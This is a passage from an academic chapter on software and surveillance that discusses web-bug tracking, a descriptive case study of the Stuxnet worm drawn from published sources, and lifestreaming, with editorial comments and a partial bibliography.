&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
[Eds: is the following sentence somewhat superfluous, in that it just reapts the lead in to the next section that you provided at the end of your last section?] Lastly, I want to turn to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &lt;br /&gt;
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself. Data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects to these systems is that humans in many cases become the vectors that both enable the data transfers carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs in many ways are life streams. Albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also nearly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
